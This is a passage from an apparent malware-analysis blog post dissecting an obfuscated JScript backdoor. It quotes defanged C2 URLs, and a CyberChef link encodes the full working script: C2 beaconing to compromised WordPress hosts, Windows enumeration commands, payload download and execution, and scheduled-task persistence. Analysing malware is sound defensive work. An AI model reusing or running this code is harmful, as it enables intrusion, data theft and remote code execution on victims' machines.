<span class="o">{</span>console.log<span class="o">(</span>e<span class="o">)</span><span class="p">;</span><span class="o">}</span><span class="k">function </span>MTvK<span class="o">(</span>CgqD<span class="o">){</span>var XwH7 <span class="o">=</span> CgqD.charCodeAt<span class="o">(</span>0<span class="o">)</span><span class="p">;</span><span class="k">if</span> <span class="o">(</span>XwH7 <span class="o">===</span> 0x2B <span class="o">||</span> XwH7 <span class="o">===</span> 0x2D<span class="o">)</span> <span class="k">return </span>62
&lt;SNIP...&gt;
</pre></table></code></div></div><p>You can take the ouput and send it to cyberchef to see what it looks like prettified. The URL is huge but <a href="https://gchq.github.io/CyberChef/#recipe=JavaScript_Beautify('%5C%5Ct','Auto',true,true)&amp;input=ZnVuY3Rpb24gVXNwRCh6RG15KQp7dmFyIG0zbUggPSBXU2NyaXB0LkNyZWF0ZU9iamVjdCgiQURPREIuU3RyZWFtIikKbTNtSC5UeXBlID0gMjttM21ILkNoYXJTZXQgPSAnNDM3JzttM21ILk9wZW4oKTttM21ILkxvYWRGcm9tRmlsZSh6RG15KTt2YXIgYzB4aSA9IG0zbUguUmVhZFRleHQ7bTNtSC5DbG9zZSgpO3JldHVybiBjel9iKGMweGkpO312YXIgQ0twUiA9IG5ldyBBcnJheSAoImh0dHA6Ly93d3cuc2FpcGFkaWVzZWwxMjQuY29tL3dwLWNvbnRlbnQvcGx1Z2lucy9pbXNhbml0eS90bXAucGhwIiwiaHR0cDovL3d3dy5mb2xrLWNhbnRhYnJpYS5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLXN0YXRpc3RpY3MvaW5jbHVkZXMvY2xhc3Nlcy9nYWxsZXJ5X2NyZWF0ZV9wYWdlX2ZpZWxkLnBocCIpO3ZhciB0cE84ID0gInczTHhuUlNiSmNxZjhIclUiO3ZhciBhdU1FID0gbmV3IEFycmF5KCJzeXN0ZW1pbmZvID4gIiwibmV0IHZpZXcgPj4gIiwibmV0IHZpZXcgL2RvbWFpbiA%2BPiAiLCJ0YXNrbGlzdCAvdiA%2BPiAiLCJncHJlc3VsdCAveiA%2BPiAiLCJuZXRzdGF0IC1uYW8gPj4gIiwiaXBjb25maWcgL2FsbCA%2BPiAiLCJhcnAgLWEgPj4gIiwibmV0IHNoYXJlID4%2BICIsIm5ldCB1c2UgPj4gIiwibmV0IHVzZXIgPj4gIiwibmV0IHVzZXIgYWRtaW5pc3RyYXRvciA%2BPiAiLCJuZXQgdXNlciAvZG9tYWluID4%2BICIsIm5ldCB1c2VyIGFkbWluaXN0cmF0b3IgL2RvbWFpbiA%2BPiAiLCJzZXQgID4%2BICIsImRpciAlc3lzdGVtZHJpdmUlXHg1Y1VzZXJzXHg1YyouKiA%2BPiAiLCJkaXIgJXVzZXJwcm9maWxlJVx4NWNBcHBEYXRhXHg1Y1JvYW1pbmdceDVjTWljcm9zb2Z0XHg1Y1dpbmRvd3NceDVjUmVjZW50XHg1YyouKiA%2BPiAiLCJkaXIgJXVzZXJwcm9maWxlJVx4NWNEZXNrdG9wXHg1YyouKiA%2BPiAiLCJ0YXNrbGlzdCAvZmkgXHgyMm1vZHVsZXMgZXEgd293NjQuZGxsXHgyMiAgPj4gIiwidGFza2xpc3QgL2ZpIFx4MjJtb2R1bGVzIG5lIHdvdzY0LmRsbFx4MjIgPj4gIiwiZGlyIFx4MjIlcHJvZ3JhbWZpbGVzKHg4NiklXHgyMiA%2BPiAiLCJkaXIgXHgyMiVwcm9ncmFtZmlsZXMlXHgyMiA%2BPiAiLCJkaXIgJWFwcGRhdGElID4%2BIik7dmFyIFFVankgPSBuZXcgQWN0aXZlWE9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKTt2YXIgTEl4RiA9IFdTY3JpcHQuU2NyaXB0TmFtZTt2YXIgdzVtWSA9ICIiO3ZhciBydUd4ID0gVGZPaCgpO2Z1bmN0aW9uIGhMaXQoWG5nUCx5MXFhKQp7Y2hhcl9zZXQgPSAiQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLyI7dmFyIFJqM2MgPSAiIjt2YXIgT0twQiA9ICIiO2ZvciAodmFyIGkgPSAwOyBpIDwgWG5nUC5sZW5ndGg7ICsraSkKe3ZhciBCOHdVID0gWG5nUC5jaGFyQ29kZUF0KGkpO3ZhciBMVXhnID0gQjh3VS50b1N0cmluZygyKTt3aGlsZSAoTFV4Zy5sZW5ndGggPCAoeTFxYSA/IDggOiAxNikpCkxVeGcgPSAiMCIgKyBMVXhnO09LcEIgKz0gTFV4Zzt3aGlsZSAoT0twQi5sZW5ndGggPj0gNikKe3ZhciB2alV1ID0gT0twQi5zbGljZSgwLDYpO09LcEIgPSBPS3BCLnNsaWNlKDYpO1JqM2MgKz0gdGhpcy5jaGFyX3NldC5jaGFyQXQocGFyc2VJbnQodmpVdSwyKSk7fX1pZiAoT0twQikKe3doaWxlIChPS3BCLmxlbmd0aCA8IDYpIE9LcEIgKz0gIjAiO1JqM2MgKz0gdGhpcy5jaGFyX3NldC5jaGFyQXQocGFyc2VJbnQoT0twQiwyKSk7fXdoaWxlIChSajNjLmxlbmd0aCAlICh5MXFhID8gNCA6IDgpICE9IDApClJqM2MgKz0gIj0iO3JldHVybiBSajNjO312YXIgYjkyQSA9IFtdO2I5MkFbJ0M3J10gICA9ICc4MCc7YjkyQVsnRkMnXSAgID0gJzgxJztiOTJBWydFOSddICAgPSAnODInO2I5MkFbJ0UyJ10gICA9ICc4Myc7YjkyQVsnRTQnXSAgID0gJzg0JztiOTJBWydFMCddICAgPSAnODUnO2I5MkFbJ0U1J10gICA9ICc4Nic7YjkyQVsnRTcnXSAgID0gJzg3JztiOTJBWydFQSddICAgPSAnODgnO2I5MkFbJ0VCJ10gICA9ICc4OSc7YjkyQVsnRTgnXSAgID0gJzhBJztiOTJBWydFRiddICAgPSAnOEInO2I5MkFbJ0VFJ10gICA9ICc4Qyc7YjkyQVsnRUMnXSAgID0gJzhEJztiOTJBWydDNCddICAgPSAnOEUnO2I5MkFbJ0M1J10gICA9ICc4Ric7YjkyQVsnQzknXSAgID0gJzkwJztiOTJBWydFNiddICAgPSAnOTEnO2I5MkFbJ0M2J10gICA9ICc5Mic7YjkyQVsnRjQnXSAgID0gJzkzJztiOTJBWydGNiddICAgPSAnOTQnO2I5MkFbJ0YyJ10gICA9ICc5NSc7YjkyQVsnRkInXSAgID0gJzk2JztiOTJBWydGOSddICAgPSAnOTcnO2I5MkFbJ0ZGJ10gICA9ICc5OCc7YjkyQVsnRDYnXSAgID0gJzk5JztiOTJBWydEQyddICAgPSAnOUEnO2I5MkFbJ0EyJ10gICA9ICc5Qic7YjkyQVsnQTMnXSAgID0gJzlDJztiOTJBWydBNSddICAgPSAnOUQnO2I5MkFbJzIwQTcnXSA9ICc5RSc7YjkyQVsnMTkyJ10gID0gJzlGJztiOTJBWydFMSddICAgPSAnQTAnO2I5MkFbJ0VEJ10gICA9ICdBMSc7YjkyQVsnRjMnXSAgID0gJ0EyJztiOTJBWydGQSddICAgPSAnQTMnO2I5MkFbJ0YxJ10gICA9ICdBNCc7YjkyQVsnRDEnXSAgID0gJ0E1JztiOTJBWydBQSddICAgPSAnQTYnO2I5MkFbJ0JBJ10gICA9ICdBNyc7YjkyQVsnQkYnXSAgID0gJ0E4JztiOTJBWycyMzEwJ10gPSAnQTknO2I5MkFbJ0FDJ10gICA9ICdBQSc7YjkyQVsnQkQnXSAgID0gJ0FCJztiOTJBWydCQyddICAgPSAnQUMnO2I5MkFbJ0ExJ10gICA9ICdBRCc7YjkyQVsnQUInXSAgID0gJ0FFJztiOTJBWydCQiddICAgPSAnQUYnO2I5MkFbJzI1OTEnXSA9ICdCMCc7YjkyQVsnMjU5MiddID0gJ0IxJztiOTJBWycyNTkzJ10gPSAnQjInO2I5MkFbJzI1MDInXSA9ICdCMyc7YjkyQVsnMjUyNCddID0gJ0I0JztiOTJBWycyNTYxJ10gPSAnQjUnO2I5MkFbJzI1NjInXSA9ICdCNic7YjkyQVsnMjU1NiddID0gJ0I3JztiOTJBWycyNTU1J10gPSAnQjgnO2I5MkFbJzI1NjMnXSA9ICdCOSc7YjkyQVsnMjU1MSddID0gJ0JBJztiOTJBWycyNTU3J10gPSAnQkInO2I5MkFbJzI1NUQnXSA9ICdCQyc7YjkyQVsnMjU1QyddID0gJ0JEJztiOTJBWycyNTVCJ10gPSAnQkUnO2I5MkFbJzI1MTAnXSA9ICdCRic7YjkyQVsnMjUxNCddID0gJ0MwJztiOTJBWycyNTM0J10gPSAnQzEnO2I5MkFbJzI1MkMnXSA9ICdDMic7YjkyQVsnMjUxQyddID0gJ0MzJztiOTJBWycyNTAwJ10gPSAnQzQnO2I5MkFbJzI1M0MnXSA9ICdDNSc7YjkyQVsnMjU1RSddID0gJ0M2JztiOTJBWycyNTVGJ10gPSAnQzcnO2I5MkFbJzI1NUEnXSA9ICdDOCc7YjkyQVsnMjU1NCddID0gJ0M5JztiOTJBWycyNTY5J10gPSAnQ0EnO2I5MkFbJzI1NjYnXSA9ICdDQic7YjkyQVsnMjU2MCddID0gJ0NDJztiOTJBWycyNTUwJ10gPSAnQ0QnO2I5MkFbJzI1NkMnXSA9ICdDRSc7YjkyQVsnMjU2NyddID0gJ0NGJztiOTJBWycyNTY4J10gPSAnRDAnO2I5MkFbJzI1NjQnXSA9ICdEMSc7YjkyQVsnMjU2NSddID0gJ0QyJztiOTJBWycyNTU5J10gPSAnRDMnO2I5MkFbJzI1NTgnXSA9ICdENCc7YjkyQVsnMjU1MiddID0gJ0Q1JztiOTJBWycyNTUzJ10gPSAnRDYnO2I5MkFbJzI1NkInXSA9ICdENyc7YjkyQVsnMjU2QSddID0gJ0Q4JztiOTJBWycyNTE4J10gPSAnRDknO2I5MkFbJzI1MEMnXSA9ICdEQSc7YjkyQVsnMjU4OCddID0gJ0RCJztiOTJBWycyNTg0J10gPSAnREMnO2I5MkFbJzI1OEMnXSA9ICdERCc7YjkyQVsnMjU5MCddID0gJ0RFJztiOTJBWycyNTgwJ10gPSAnREYnO2I5MkFbJzNCMSddICA9ICdFMCc7YjkyQVsnREYnXSAgID0gJ0UxJztiOTJBWyczOTMnXSAgPSAnRTInO2I5MkFbJzNDMCddICA9ICdFMyc7YjkyQVsnM0EzJ10gID0gJ0U0JztiOTJBWyczQzMnXSAgPSAnRTUnO2I5MkFbJ0I1J10gICA9ICdFNic7YjkyQVsnM0M0J10gID0gJ0U3JztiOTJBWyczQTYnXSAgPSAnRTgnO2I5MkFbJzM5OCddICA9ICdFOSc7YjkyQVsnM0E5J10gID0gJ0VBJztiOTJBWyczQjQnXSAgPSAnRUInO2I5MkFbJzIyMUUnXSA9ICdFQyc7YjkyQVsnM0M2J10gID0gJ0VEJztiOTJBWyczQjUnXSAgPSAnRUUnO2I5MkFbJzIyMjknXSA9ICdFRic7YjkyQVsnMjI2MSddID0gJ0YwJztiOTJBWydCMSddICAgPSAnRjEnO2I5MkFbJzIyNjUnXSA9ICdGMic7YjkyQVsnMjI2NCddID0gJ0YzJztiOTJBWycyMzIwJ10gPSAnRjQnO2I5MkFbJzIzMjEnXSA9ICdGNSc7YjkyQVsnRjcnXSAgID0gJ0Y2JztiOTJBWycyMjQ4J10gPSAnRjcnO2I5MkFbJ0IwJ10gICA9ICdGOCc7YjkyQVsnMjIxOSddID0gJ0Y5JztiOTJBWydCNyddICAgPSAnRkEnO2I5MkFbJzIyMUEnXSA9ICdGQic7YjkyQVsnMjA3RiddID0gJ0ZDJztiOTJBWydCMiddICAgPSAnRkQnO2I5MkFbJzI1QTAnXSA9ICdGRSc7YjkyQVsnQTAnXSAgID0gJ0ZGJztmdW5jdGlvbiBUZk9oKCkKe3ZhciBheXVoID0gTWF0aC5jZWlsKE1hdGgucmFuZG9tKCkqMTAgKyAyNSk7dmFyIG5hbWUgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKE1hdGguY2VpbChNYXRoLnJhbmRvbSgpKjI0ICsgNjUpKTt2YXIgZGM5ViA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJXU2NyaXB0Lk5ldHdvcmsiKTt3NW1ZID0gZGM5Vi5Vc2VyTmFtZTtmb3IgKHZhciBjb3VudCA9IDA7IGNvdW50IDxheXVoIDtjb3VudCsrICkKe3N3aXRjaCAoTWF0aC5jZWlsKE1hdGgucmFuZG9tKCkqMykpCiAge2Nhc2UgMToKbmFtZSA9IG5hbWUgKyBNYXRoLmNlaWwoTWF0aC5yYW5kb20oKSo4KTsgICAgICBicmVhazsgICAgY2FzZSAyOgogICAgICAgIG5hbWUgPSBuYW1lICsgU3RyaW5nLmZyb21DaGFyQ29kZShNYXRoLmNlaWwoTWF0aC5yYW5kb20oKSoyNCArIDk3KSk7ICAgICAgYnJlYWs7ICAgIGRlZmF1bHQ6CiAgICAgICAgbmFtZSA9IG5hbWUgKyBTdHJpbmcuZnJvbUNoYXJDb2RlKE1hdGguY2VpbChNYXRoLnJhbmRvbSgpKjI0ICsgNjUpKTsgICAgICBicmVhazsgIH19cmV0dXJuIG5hbWU7fXZhciB3eUtOID0gQmxneChiSWRHKCkpO3RyeQp7dmFyIFdFODYgPSBiSWRHKCk7ckdjUigpO2pTbTgoKTt9Y2F0Y2goZSkKe1dTY3JpcHQuUXVpdCgpO31mdW5jdGlvbiBqU204KCkKe3ZhciBjOWxyID0gRnY2YigpO3doaWxlKHRydWUpCntmb3IgKHZhciBpID0gMDsgaSA8IENLcFIubGVuZ3RoOyBpKyspCnt2YXIgWXN5byA9IENLcFJbaV07dmFyIGYzY2IgPSBYRVdHKFlzeW8sYzlscik7CnN3aXRjaCAoZjNjYikKe2Nhc2UgImdvb2QiOgogICAgYnJlYWs7ICBjYXNlICJleGl0IjogV1NjcmlwdC5RdWl0KCk7ICAgIGJyZWFrOyAgY2FzZSAid29yayI6IFhCTDMoWXN5byk7ICAgIGJyZWFrOyAgY2FzZSAiZmFpbCI6IHRiTXUoKTsKICAgIGJyZWFrOyAgZGVmYXVsdDoKICAgIGJyZWFrO31UZk9oKCk7fVdTY3JpcHQuU2xlZXAoKE1hdGgucmFuZG9tKCkqMzAwICsgMzYwMCkgKiAxMDAwKTt9fWZ1bmN0aW9uIGJJZEcoKQp7dmFyIHNwcTM9IHRoaXNbJ1x1MDA0MVx1MDA2M1x1MDA3NGlcdTAwNzZlWFx1MDA0Rlx1MDA2MmpcdTAwNjVjXHUwMDc0J107dmFyIHpCVnYgPSBuZXcgc3BxMygnXHUwMDU3XHUwMDUzY3JcdTAwNjlcdTAwNzBcdTAwNzRcdTAwMkVcdTAwNTNoZVx1MDA2Q1x1MDA2QycpO3JldHVybiB6QlZ2O31mdW5jdGlvbiBYQkwzKEJfVEcpCnt2YXIgWUltZSA9ICB3eUtOICsgTEl4Ri5zdWJzdHJpbmcoMCxMSXhGLmxlbmd0aCAtIDIpICsgInBpZiI7dmFyIEtweG8gPSBuZXcgQWN0aXZlWE9iamVjdCgiTVNYTUwyLlhNTEhUVFAiKTtLcHhvLk9QRU4oInBvc3QiLEJfVEcsZmFsc2UpO0tweG8uU0VUUkVRVUVTVEhFQURFUigidXNlci1hZ2VudDoiLCJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdpbjY0OyB4NjQpOyAiICsgU3o4aygpKTtLcHhvLlNFVFJFUVVFU1RIRUFERVIoImNvbnRlbnQtdHlwZToiLCJhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0iKTtLcHhvLlNFVFJFUVVFU1RIRUFERVIoImNvbnRlbnQtbGVuZ3RoOiIsIjQiKTtLcHhvLlNFTkQoIndvcmsiKTtpZiAoUVVqeS5GSUxFRVhJU1RTKFlJbWUpKQp7UVVqeS5ERUxFVEVGSUxFKFlJbWUpO31pZiAoS3B4by5TVEFUVVMgPT0gMjAwKQp7dmFyIG0zbUggPSBuZXcgQWN0aXZlWE9iamVjdCgiQURPREIuU1RSRUFNIik7bTNtSC5UWVBFID0gMTttM21ILk9QRU4oKTttM21ILldSSVRFKEtweG8ucmVzcG9uc2VCb2R5KTttM21ILlBvc2l0aW9uID0gMDttM21ILlR5cGUgPSAyO20zbUguQ2hhclNldCA9ICI0MzciO3ZhciBjMHhpID0gbTNtSC5SZWFkVGV4dChtM21ILlNpemUpO3ZhciBwdEYwID0gRlh4OSgiMmY1MzJkNmJhZWMzZDBlYzdiMWY5OGFlZDQ3NzQ4NDMiLGN6X2IoYzB4aSkpO05vUlMocHRGMCxZSW1lKTsgICAgICAgICAgICAgICAgICBtM21ILkNsb3NlKCk7fXZhciBydUd4ID0gVGZPaCgpO2M1YWUoWUltZSxCX1RHKTtXU2NyaXB0LlNsZWVwKDMwMDAwKTtRVWp5LkRFTEVURUZJTEUoWUltZSk7fWZ1bmN0aW9uIHRiTXUoKQp7UVVqeS5ERUxFVEVGSUxFKFdTY3JpcHQuU0NSSVBURlVMTE5BTUUpO2VWX0MoIlRhc2tNYW5hZ2VyIiwiV2luZG93cyBUYXNrIE1hbmFnZXIiLHc1bVksdl9GaWxlTmFtZSwiRXpaRVRjU1h5S0FkRl9lNUkyaTEiLHd5S04sZmFsc2UpO0toRG4oIlRhc2tNYW5hZ2VyIik7V1NjcmlwdC5RdWl0KCk7fWZ1bmN0aW9uIFhFV0codVhISyxobTJqKQp7dHJ5Cnt2YXIgS3B4byA9IG5ldyBBY3RpdmVYT2JqZWN0KCJNU1hNTDIuWE1MSFRUUCIpO0tweG8uT1BFTigicG9zdCIsdVhISyxmYWxzZSk7S3B4by5TRVRSRVFVRVNUSEVBREVSKCJ1c2VyLWFnZW50OiIsIk1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV2luNjQ7IHg2NCk7ICIgKyBTejhrKCkpO0tweG8uU0VUUkVRVUVTVEhFQURFUigiY29udGVudC10eXBlOiIsImFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbSIpO3ZhciByUmkzID0gaExpdChobTJqLHRydWUpO0tweG8uU0VUUkVRVUVTVEhFQURFUigiY29udGVudC1sZW5ndGg6IixyUmkzLmxlbmd0aCk7S3B4by5TRU5EKHJSaTMpO3JldHVybiBLcHhvLnJlc3BvbnNlVGV4dDt9Y2F0Y2goZSkKe3JldHVybiAiIjt9fWZ1bmN0aW9uIFN6OGsoKQp7dmFyIG45bVYgPSIiO3ZhciBkYzlWID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIldTY3JpcHQuTmV0d29yayIpO3ZhciByUmkzID0gdHBPOCArIGRjOVYuQ29tcHV0ZXJOYW1lICsgdzVtWTtmb3IgKHZhciBpID0gMDsgaSA8IDE2OyBpKyspCnt2YXIgWXNYQSA9IDAKZm9yICh2YXIgaiA9IGk7IGogPCByUmkzLmxlbmd0aCAtIDE7IGorKykKe1lzWEEgPSBZc1hBIF4gclJpMy5jaGFyQ29kZUF0KGopO31Zc1hBID0oWXNYQSAlIDEwKTtuOW1WID0gbjltViArIFlzWEEudG9TdHJpbmcoMTApO31uOW1WID0gbjltViArIHRwTzg7cmV0dXJuIG45bVY7fWZ1bmN0aW9uIHJHY1IoKQp7dl9GaWxlTmFtZSA9ICB3eUtOICsgTEl4Ri5zdWJzdHJpbmcoMCxMSXhGLmxlbmd0aCAtIDIpICsgImpzIjtRVWp5LkNPUFlGSUxFKFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUsd3lLTiArIExJeEYpO3ZhciBIRnA3ID0gKE1hdGgucmFuZG9tKCkqMTUwICsgMzUwKSAqIDEwMDA7V1NjcmlwdC5TbGVlcChIRnA3KTtlVl9DKCJUYXNrTWFuYWdlciIsIldpbmRvd3MgVGFzayBNYW5hZ2VyIix3NW1ZLHZfRmlsZU5hbWUsIkV6WkVUY1NYeUtBZEZfZTVJMmkxIix3eUtOLHRydWUpO31mdW5jdGlvbiBGdjZiKCkKe3ZhciBtX1JyID0gIHd5S04gKyAifmRhdC50bXAiO2ZvciAodmFyIGkgPSAwOyBpIDwgYXVNRS5sZW5ndGg7IGkrKykKe1dFODYuUnVuKCJjbWQuZXhlIC9jICIgKyBhdU1FW2ldICsgIlx4MjIiICsgbV9SciArICJceDIyIiwwLHRydWUpOwp9dmFyIG5SVk4gPSBVc3BEKG1fUnIpO1dTY3JpcHQuU2xlZXAoMTAwMCk7UVVqeS5ERUxFVEVGSUxFKG1fUnIpO3JldHVybiBGWHg5KCIyZjUzMmQ2YmFlYzNkMGVjN2IxZjk4YWVkNDc3NDg0MyIsblJWTik7fWZ1bmN0aW9uIGM1YWUoWUltZSxCX1RHKQp7dHJ5CntpZiAoUVVqeS5GSUxFRVhJU1RTKFlJbWUpKQp7V0U4Ni5SdW4oIlx4MjIiICsgWUltZSArICJceDIyIiApO319Y2F0Y2goZSkKe3ZhciBLcHhvID0gbmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5YTUxIVFRQIik7S3B4by5PUEVOKCJwb3N0IixCX1RHLGZhbHNlKTt2YXIgZVBNeSA9ICJlcnJvciI7CktweG8uU0VUUkVRVUVTVEhFQURFUigidXNlci1hZ2VudDoiLCJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdpbjY0OyB4NjQpOyAiICsgU3o4aygpKTtLcHhvLlNFVFJFUVVFU1RIRUFERVIoImNvbnRlbnQtdHlwZToiLCJhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0iKTtLcHhvLlNFVFJFUVVFU1RIRUFERVIoImNvbnRlbnQtbGVuZ3RoOiIsZVBNeS5sZW5ndGgpO0tweG8uU0VORChlUE15KTtyZXR1cm4gIiI7fX1mdW5jdGlvbiBSUGJZKHJfWDUpCnt2YXIgdzhyRz0iMDEyMzQ1Njc4OUFCQ0RFRiI7dmFyIHlqcncgPSB3OHJHLnN1YnN0cihyX1g1ICYgMTUsMSk7d2hpbGUocl9YNT4xNSkKe3JfWDUgPj4%2BPSA0O3lqcncgPSB3OHJHLnN1YnN0cihyX1g1ICYgMTUsMSkgKyB5anJ3O31yZXR1cm4geWpydzt9ZnVuY3Rpb24gTnB0TyhqbEVpKQp7cmV0dXJuIHBhcnNlSW50KGpsRWksMTYpO31mdW5jdGlvbiBlVl9DKEJqbXIsUlQ2eCxPN0VjLFlCd1AsVDlQeCxlZ05yLHJtR0gpCnt0cnkKe3ZhciBCR2ZJID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIlNjaGVkdWxlLlNlcnZpY2UiKTtCR2ZJLkNvbm5lY3QoKTt2YXIgdzJjUSA9IEJHZkkuR2V0Rm9sZGVyKCJXUEQiKTt2YXIgeFNtMyA9IEJHZkkuTmV3VGFzaygwKTt4U20zLlByaW5jaXBhbC5Vc2VySWQgPSBPN0VjO3hTbTMuUHJpbmNpcGFsLkxvZ29uVHlwZSA9IDY7dmFyIHdLMkYgPSB4U20zLlJlZ2lzdHJhdGlvbkluZm87d0syRi5EZXNjcmlwdGlvbiA9IFJUNng7d0syRi5BdXRob3IgPSBPN0VjO3ZhciBhWWJ4ID0geFNtMy5TZXR0aW5nczthWWJ4LkVuYWJsZWQgPSB0cnVlO2FZYnguU3RhcnRXaGVuQXZhaWxhYmxlID0gdHJ1ZTthWWJ4LkhpZGRlbiA9IHJtR0g7dmFyIG9TUDcgPSAiMjAxNS0wNy0xMlQxMTo0NzoyNCI7dmFyIHN2YUcgPSAiMjAyMC0wMy0yMVQwODowMDowMCI7dmFyIExEb04gPSB4U20zLlRyaWdnZXJzO3ZhciByOUVDID0gTERvTi5DcmVhdGUoOSk7cjlFQy5TdGFydEJvdW5kYXJ5ID0gb1NQNztyOUVDLkVuZEJvdW5kYXJ5ID0gc3ZhRztyOUVDLklkID0gIkxvZ29uVHJpZ2dlcklkIjtyOUVDLlVzZXJJZCA9IE83RWM7cjlFQy5FbmFibGVkID0gdHJ1ZTt2YXIgZ1F1OSA9IHhTbTMuQWN0aW9ucy5DcmVhdGUoMCk7Z1F1OS5QYXRoID0gWUJ3UDtnUXU5LkFyZ3VtZW50cyA9IFQ5UHg7Z1F1OS5Xb3JraW5nRGlyZWN0b3J5ID0gZWdOcjt3MmNRLlJlZ2lzdGVyVGFza0RlZmluaXRpb24oQmptcix4U20zLDYsIiIsIiIsMyk7cmV0dXJuIHRydWU7fWNhdGNoKEVycikKe3JldHVybiBmYWxzZTt9fWZ1bmN0aW9uIEtoRG4oQmptcikKe3RyeQp7dmFyIFVHZ3cgPSBmYWxzZTt2YXIgQkdmSSA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJTY2hlZHVsZS5TZXJ2aWNlIik7QkdmSS5Db25uZWN0KCkKCgp2YXIgdzJjUSA9IEJHZkkuR2V0Rm9sZGVyKCJXUEQiKTt2YXIgRkxzNiA9IHcyY1EuR2V0VGFza3MoMCk7aWYgKEZMczYuY291bnQgPj0gMCkKe3ZhciBnazFIID0gbmV3IEVudW1lcmF0b3IoRkxzNik7Zm9yICg7ICFnazFILmF0RW5kKCk7IGdrMUgubW92ZU5leHQoKSkKe2lmIChnazFILml0ZW0oKS5uYW1lID09IEJqbXIpCnt3MmNRLkRlbGV0ZVRhc2soQmptciwwKTtVR2d3ID0gdHJ1ZTt9fX19Y2F0Y2goRXJyKQp7cmV0dXJuIGZhbHNlO319ZnVuY3Rpb24gY3pfYihTM1dzKQp7dmFyIG45bVYgPSBbXTt2YXIgbXZBdSA9IFMzV3MubGVuZ3RoO2ZvciAodmFyIGkgPSAwOyBpIDwgbXZBdTsgaSsrKQp7dmFyIHd0VlggPSBTM1dzLmNoYXJDb2RlQXQoaSk7aWYod3RWWCA%2BPSAxMjgpCnt2YXIgaCA9IGI5MkFbJycgKyBSUGJZKHd0VlgpXTt3dFZYID0gTnB0TyhoKTt9bjltVi5wdXNoKHd0VlgpO31yZXR1cm4gbjltVjt9ZnVuY3Rpb24gTm9SUyhFeFkyLGlnZUspCnt2YXIgbTNtSCA9IFdTY3JpcHQuQ3JlYXRlT2JqZWN0KCJBRE9EQi5TdHJlYW0iKTttM21ILnR5cGUgPSAyO20zbUguQ2hhcnNldCA9ICJpc28tODg1OS0xIjttM21ILk9wZW4oKTttM21ILldyaXRlVGV4dChFeFkyKTttM21ILkZsdXNoKCk7bTNtSC5Qb3NpdGlvbiA9IDA7bTNtSC5TYXZlVG9GaWxlKGlnZUssMik7bTNtSC5jbG9zZSgpO31mdW5jdGlvbiBCbGd4KGdhV28pCnt3eUtOID0gImM6XHg1Y1VzZXJzXHg1YyIgKyB3NW1ZICsgIlx4NWNBcHBEYXRhXHg1Y0xvY2FsXHg1Y01pY3Jvc29mdFx4NWNXaW5kb3dzXHg1YyI7aWYgKCEgUVVqeS5GT0xERVJFWElTVFMod3lLTikpCnd5S04gPSAiYzpceDVjVXNlcnNceDVjIiArIHc1bVkgKyAiXHg1Y0FwcERhdGFceDVjTG9jYWxceDVjVGVtcFx4NWMiO2lmICghIFFVankuRk9MREVSRVhJU1RTKHd5S04pKQp3eUtOID0gImM6XHg1Y0RvY3VtZW50cyBhbmQgU2V0dGluZ3NceDVjIiArIHc1bVkgKyAiXHg1Y0FwcGxpY2F0aW9uIERhdGFceDVjTWljcm9zb2Z0XHg1Y1dpbmRvd3NceDVjIjtyZXR1cm4gd3lLTgp9ZnVuY3Rpb24gRlh4OShaXzNGLFZNZDcpCnt2YXIgTk5TWCA9IFtdO3ZhciBKRHJvID0gMDt2YXIgS2FnWTt2YXIgbjltViA9ICcnO2ZvciAodmFyIGkgPSAwOyBpIDwgMjU2OyBpKyspCntOTlNYW2ldID0gaTt9Zm9yICh2YXIgaSA9IDA7IGkgPCAyNTY7IGkrKykKe0pEcm8gPSAoSkRybyArIE5OU1hbaV0gKyBaXzNGLmNoYXJDb2RlQXQoaSAlIFpfM0YubGVuZ3RoKSkgJSAyNTY7S2FnWSA9IE5OU1hbaV07Tk5TWFtpXSA9IE5OU1hbSkRyb107Tk5TWFtKRHJvXSA9IEthZ1k7fXZhciBpID0gMDt2YXIgSkRybyA9IDA7Zm9yICh2YXIgeSA9IDA7IHkgPCBWTWQ3Lmxlbmd0aDsgeSsrKQp7aSA9IChpICsgMSkgJSAyNTY7SkRybyA9IChKRHJvICsgTk5TWFtpXSkgJSAyNTY7S2FnWSA9IE5OU1hbaV07Tk5TWFtpXSA9IE5OU1hbSkRyb107Tk5TWFtKRHJvXSA9IEthZ1k7bjltViArPSBTdHJpbmcuZnJvbUNoYXJDb2RlKFZNZDdbeV0gXiBOTlNYWyhOTlNYW2ldICsgTk5TWFtKRHJvXSkgJSAyNTZdKTt9cmV0dXJuIG45bVY7fQ">this is it</a> so I hope it works</p><p>Right away we can see a ton of suspicious stuff. Like this block of URLs, defanged</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>var CKpR = new Array('hxxp://www.saipadiesel124[.]com/wp-content/plugins/imsanity/tmp[.]php', 'hxxp://www.folk-cantabria[.]com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field[.]php');

</pre></table></code></div></div><p>You also see this block of commands to enumerate system information</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
